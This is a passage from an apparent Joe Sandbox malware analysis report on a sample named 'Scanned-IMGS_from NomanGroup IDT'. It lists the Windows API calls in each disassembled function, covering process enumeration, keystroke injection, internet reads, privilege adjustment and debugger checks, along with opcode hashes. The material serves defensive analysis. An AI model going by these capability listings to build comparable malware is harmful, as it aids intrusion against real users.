                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-1546025612
                                                                                • Opcode ID: 0d138df9ea90d600622cea0f5711fc1b8bc2b61053358e3e0716eb8144ddef94
                                                                                • Instruction ID: f862c67b88b28e5e8b2c30bdf8d863a75ededd44d48131c20af6706ba047171a
                                                                                • Opcode Fuzzy Hash: 0d138df9ea90d600622cea0f5711fc1b8bc2b61053358e3e0716eb8144ddef94
                                                                                • Instruction Fuzzy Hash: 01A29F70A0021ACBDF24CF58C9407AEBBB1BF54311F2581ABEC15A7385EB389D85CB59
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004B82AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($tbQ$|
                                                                                • API String ID: 1659193697-2774208020
                                                                                • Opcode ID: e3e428cdc79f9cbbb292a1be60ecb85bf0875de275dee68b5e9faa65f1dd7ebf
                                                                                • Instruction ID: c256d3132885fb308cfdea7765ee7ec31ddfd10c2048ae9d2d8133e3238e3272
                                                                                • Opcode Fuzzy Hash: e3e428cdc79f9cbbb292a1be60ecb85bf0875de275dee68b5e9faa65f1dd7ebf
                                                                                • Instruction Fuzzy Hash: 37323674A00605DFCB28CF19C480AAAB7F4FF48710B15C56EE89ADB7A1EB74E941CB54
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004DA6AC
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004DA6BA
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004DA79C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DA7AB
                                                                                  • Part of subcall function 0046CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00493303,?), ref: 0046CE8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                • String ID:
                                                                                • API String ID: 1991900642-0
                                                                                • Opcode ID: 05836322e33b1694136cc2cb4cc2313c0b1af7172a52e00da4977df5c5dcd8c1
                                                                                • Instruction ID: 4478ea259b1a0eb969ebefd218f50d2d234e6a33aae6f16197952c481868f590
                                                                                • Opcode Fuzzy Hash: 05836322e33b1694136cc2cb4cc2313c0b1af7172a52e00da4977df5c5dcd8c1
                                                                                • Instruction Fuzzy Hash: B6515171508340AFD710EF25C885E6BBBE8FF89758F40492EF98597252EB34D908CB96
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004BAAAC
                                                                                • SetKeyboardState.USER32(00000080), ref: 004BAAC8
                                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004BAB36
                                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004BAB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: eab32102fc29236008734e89fc73b982abd4c74b631ea53566a70a0de6dfe420
                                                                                • Instruction ID: 0e519b7d83a4f4b05f3c984b1f33d55694eb54cb8c98dce1680c40207474bd19
                                                                                • Opcode Fuzzy Hash: eab32102fc29236008734e89fc73b982abd4c74b631ea53566a70a0de6dfe420
                                                                                • Instruction Fuzzy Hash: 91312930A44248AEEF34CA658C45BFB7BA6AB44310F04421BE2A1562D1D37CADA5C77B
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0048BB7F
                                                                                  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
                                                                                  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0048BB91
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0052121C,000000FF,?,0000003F,?,?), ref: 0048BC09
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,00521270,000000FF,?,0000003F,?,?,?,0052121C,000000FF,?,0000003F,?,?), ref: 0048BC36
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                • String ID:
                                                                                • API String ID: 806657224-0
                                                                                • Opcode ID: f95c8f1bfa9b6a825880e088d9cec623611fdbcc0079765eda10c03c5b3f6929
                                                                                • Instruction ID: 12c45588c2f26cbb38c1d241dd60141cbb9fd370a35952d98c4246f852e56bb1
                                                                                • Opcode Fuzzy Hash: f95c8f1bfa9b6a825880e088d9cec623611fdbcc0079765eda10c03c5b3f6929
                                                                                • Instruction Fuzzy Hash: B131C270904645DFCB11EF6ADC8042EBBB8FF663107144A6EF460DB3A1D7349942DB98
                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 004CCE89
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004CCEEA
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 004CCEFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                • String ID:
                                                                                • API String ID: 234945975-0
                                                                                • Opcode ID: e95b11b581806d979017d8937b1ac090cfa18b4d39801dbe98dce74119cb8b01
                                                                                • Instruction ID: 617e27a0f6706aa0903e0c6364165c8b537ddc68df5a27a01cabca9a97dd6ba9
                                                                                • Opcode Fuzzy Hash: e95b11b581806d979017d8937b1ac090cfa18b4d39801dbe98dce74119cb8b01
                                                                                • Instruction Fuzzy Hash: 7621DE759003059BD7608F65C9C4FAB77F8EB01308F10442FE64A92291E738EA058B58
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,00495222), ref: 004BDBCE
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004BDBDD
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BDBEE
                                                                                • FindClose.KERNEL32(00000000), ref: 004BDBFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: f572ec6a6af1ec7d641e2995c03cc61b68073f9cd961d24c1a5e8ff3ca892f18
                                                                                • Instruction ID: f54d74e09a39eb7098b7938a4a7c708cd0d454235fcd07612b4443e16b771aa1
                                                                                • Opcode Fuzzy Hash: f572ec6a6af1ec7d641e2995c03cc61b68073f9cd961d24c1a5e8ff3ca892f18
                                                                                • Instruction Fuzzy Hash: 27F0A030C109105782206B78AC8E8AB7B7C9F01334B144793F936C21E1FBB45D5686AE
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004C5CC1
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C5D17
                                                                                • FindClose.KERNEL32(?), ref: 004C5D5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID:
                                                                                • API String ID: 3541575487-0
                                                                                • Opcode ID: 5e62793829ab34761bb3c84ee27ab72b469d0e3f545c62ae6191202252f78e3a
                                                                                • Instruction ID: 04c3d0c39263459284edb4ef9da3d32ee683030c5e890aa1f68b24f87cac43a3
                                                                                • Opcode Fuzzy Hash: 5e62793829ab34761bb3c84ee27ab72b469d0e3f545c62ae6191202252f78e3a
                                                                                • Instruction Fuzzy Hash: 66518638604B019FC714CF28C484E9AB7E4FF49318F14855EE99A8B3A2DB38F845CB95
APIs
• IsDebuggerPresent.KERNEL32 ref: 0048271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00482724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00482731
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 8aea1b046e30cee5e26f6d20d4671b0821b2626faad9a576ede1451ef2aeadfd
• Instruction ID: a5227cf22b9ab560ca275ed9301575db8fca5386729932af519bd849305673a9
• Opcode Fuzzy Hash: 8aea1b046e30cee5e26f6d20d4671b0821b2626faad9a576ede1451ef2aeadfd
• Instruction Fuzzy Hash: 8D31D574901318ABCB21DF65DD887DDBBB8AF18310F5081EAE80CA7261E7749F818F48
APIs
• SetErrorMode.KERNEL32(00000001), ref: 004C51DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004C5238
• SetErrorMode.KERNEL32(00000000), ref: 004C52A1
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: 149afddddc86ff98a4b8a978671259127ef661e5739a771a26386b69a0d9d1f7
• Instruction ID: 1d6979d34ac79007ddbe416469fcd9b671341204eb29cf74df7257ca00e37f3e
• Opcode Fuzzy Hash: 149afddddc86ff98a4b8a978671259127ef661e5739a771a26386b69a0d9d1f7
• Instruction Fuzzy Hash: F7313C75A00618DFDB00DF55D8C4EADBBB4FF48318F048099E8459B392DB35E85ACB54
APIs
  • Part of subcall function 0046FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00470668
  • Part of subcall function 0046FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00470685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
• GetLastError.KERNEL32 ref: 004B174A
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
• Opcode ID: 4af3dab9f43aa53b755be6ae7ca027613ac7b4f187638194b1c810d3d0bec8f7
• Instruction ID: ab28642a01b312d06c09fa8163aacd62ec948dfba69d581fadbfe912e97bfa70
• Opcode Fuzzy Hash: 4af3dab9f43aa53b755be6ae7ca027613ac7b4f187638194b1c810d3d0bec8f7
• Instruction Fuzzy Hash: F611CEB2400304AFD718AF54ECC6DABB7BDEB05714B20852FE49657291EB74BC428B68
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004BD608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004BD645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004BD650
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: f883b30cbe13319560d67f2b213b45d54c295eb979ce1f04e918bd1d3e92eef9
• Instruction ID: 5fc6abce670f6f6e0bf66d8608e840f9003e9e1d6b0c021d2215df0c8d794ab6
• Opcode Fuzzy Hash: f883b30cbe13319560d67f2b213b45d54c295eb979ce1f04e918bd1d3e92eef9
• Instruction Fuzzy Hash: 7E113C75E05228BBDB108F959C85FEFBFBCEB45B50F108166F904E7290D6704A058BA5
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004B168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004B16A1
• FreeSid.ADVAPI32(?), ref: 004B16B1
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: b83ef654a11ec12e08017b3a7cbd0e2962ce88de23a299dba9aa889977d34b1c
• Instruction ID: bfcfd1735af130839b02aee69a98b3d76578395e7e22dc71cd6ed49a6d21bab7
• Opcode Fuzzy Hash: b83ef654a11ec12e08017b3a7cbd0e2962ce88de23a299dba9aa889977d34b1c
• Instruction Fuzzy Hash: 08F0F471950309FBDB00DFE49CC9EAEBBBCEB08604F504965E501E6191E774AA448A64
APIs
• GetCurrentProcess.KERNEL32(004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000,?,004828E9), ref: 00474D09
• TerminateProcess.KERNEL32(00000000,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000,?,004828E9), ref: 00474D10
• ExitProcess.KERNEL32 ref: 00474D22
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: a5b0d848b6d6f24bbbd69dc1890deb46f65ec6a1930addb5de1de63a03a870a7
• Instruction ID: f9ac48711cc89c216f23b9ee7c5db876e3f388eef9f0a453737d4d70674d6f2f
• Opcode Fuzzy Hash: a5b0d848b6d6f24bbbd69dc1890deb46f65ec6a1930addb5de1de63a03a870a7
• Instruction Fuzzy Hash: A2E0BF31000188AFCF21AF55DD99A993B69EB81785B118429FC599A223DB39DD52CB48
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 004AD28C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: ef58e262db6b42523ca38eb136556779169e70ea65ae7b29e20d1391a69204a2
• Instruction ID: 38a02683005b6fad86efcc5526d707101bced3cf29c8a6f2ec08110d2ad555b2
• Opcode Fuzzy Hash: ef58e262db6b42523ca38eb136556779169e70ea65ae7b29e20d1391a69204a2
• Instruction Fuzzy Hash: A9D0C9B5C0111DEACB90DB90DCC8DD9B37CBB14305F100192F506A2000D734954A8F15
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
• Instruction ID: a91280f4d64d1a561b3fd4324d96c29428118030e2b793674ba4fbb1294686d2
• Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
• Instruction Fuzzy Hash: D3021B71E002199FDF24CFA9D9806EEBBF1EF48314F25816ED919E7384D734AA418B84
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.$p#R
• API String ID: 0-3568732149
• Opcode ID: ccb4b70716c2b483a656e067e54ac1bb6e18b4e86367ce85fa7b71dd04c927c0
• Instruction ID: 95c4485017989d3eb09f139a3f60a188164a449e7f300c69e8db58cfa629a4fa
• Opcode Fuzzy Hash: ccb4b70716c2b483a656e067e54ac1bb6e18b4e86367ce85fa7b71dd04c927c0
• Instruction Fuzzy Hash: A2326971900318DFDF14DF90C881AEEB7B5BF15309F14405AE806AB392D779AE4ACB69
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004C6918
• FindClose.KERNEL32(00000000), ref: 004C6961
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: fd0582cf7fbd510cd5e9b5a4d802d6a9ef08ed045336f02e78f76c7166b79bdf
• Instruction ID: 820f1265eb48a3ecb5780cbc9cd9fda24c5a2d2898d631ac7d00e1f4365d3a10
• Opcode Fuzzy Hash: fd0582cf7fbd510cd5e9b5a4d802d6a9ef08ed045336f02e78f76c7166b79bdf
• Instruction Fuzzy Hash: FB11AF756042009FC710CF29D8C5A16BBE1EF84329F05C6AEE8698F3A2C734EC05CB95
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37E4
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,004D4891,?,?,00000035,?), ref: 004C37F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
